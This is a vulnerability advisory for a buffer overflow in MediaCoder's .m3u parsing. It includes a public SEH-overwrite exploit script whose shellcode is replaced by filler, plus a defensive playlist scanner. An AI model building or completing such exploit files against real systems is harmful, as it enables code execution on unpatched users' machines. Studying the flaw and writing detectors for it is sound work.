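MediaCoder 0.8.34.5716 Buffer Overflow Vulnerability
Published: 2015-05-06
Updated: 2015-05-07

Affected systems:
MediaCoder MediaCoder 0.8.34.5716
Description:
MediaCoder is a free, general-purpose batch audio/video transcoding tool.

MediaCoder has a buffer overflow vulnerability in its handling of malformed .m3u files. An attacker can exploit this vulnerability to perform unauthorized operations.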

<*Source: vendor
  *>

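Test method:
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#!/usr/bin/python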
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe

# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insufficient space after taking control of the EIP, you have to jump backwards and also
#        avoid a few bad bytes after the "A"s.

buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] =
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll]
seh = "\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f = open("exploit.m3u","w")
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()

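Recommendation:
Vendor patch:

MediaCoder
----------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://mediacoder.com.cn/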
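
Because no patch is available, untrusted playlists can be screened before they are opened in the affected version. The following is an added example, not part of the original advisory or the vendor's code: it flags .m3u lines that are oversized, contain long repeated-byte filler, or contain control bytes. The two thresholds, the function names and the sample data are assumptions made for illustration.

```python
import itertools

MAX_ENTRY_LEN = 512   # assumed limit, not a documented MediaCoder value
MAX_RUN = 64          # assumed limit for one byte repeated back to back


def longest_run(data):
    """Length of the longest run of one repeated byte in data."""
    return max((len(list(g)) for _, g in itertools.groupby(data)), default=0)


def check_entry(entry):
    """Return the reasons (possibly none) why one playlist line looks malformed."""
    reasons = []
    if len(entry) > MAX_ENTRY_LEN:
        reasons.append("length %d > %d" % (len(entry), MAX_ENTRY_LEN))
    if longest_run(entry) > MAX_RUN:
        reasons.append("repeated-byte run > %d" % MAX_RUN)
    # Control bytes other than TAB do not belong in a path or URL.
    if any((b < 0x20 and b != 0x09) or b == 0x7F for b in entry):
        reasons.append("control bytes in entry")
    return reasons


def scan_m3u(data):
    """Scan raw .m3u bytes; return [(line_number, reasons)] for suspicious lines."""
    hits = []
    for number, line in enumerate(data.split(b"\n"), start=1):
        entry = line.rstrip(b"\r")
        if not entry:
            continue  # blank line
        reasons = check_entry(entry)
        if reasons:
            hits.append((number, reasons))
    return hits


# Constructed samples: a normal playlist and one with a single oversized
# entry made of filler only.
GOOD = (b"#EXTM3U\r\n#EXTINF:215,Artist - Track\r\n"
        b"http://media.example/track01.mp3\r\nC:\\Music\\track02.mp3\r\n")
BAD = b"#EXTM3U\r\nhttp://" + b"A" * 900 + b"\r\n"

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for number, reasons in scan_m3u(fh.read()):
                print("%s:%d: %s" % (path, number, "; ".join(reasons)))
```

Run it with one or more playlist paths as arguments; each flagged line is reported as path:line with the reasons. Legitimate playlists with very long URLs may need a higher length limit.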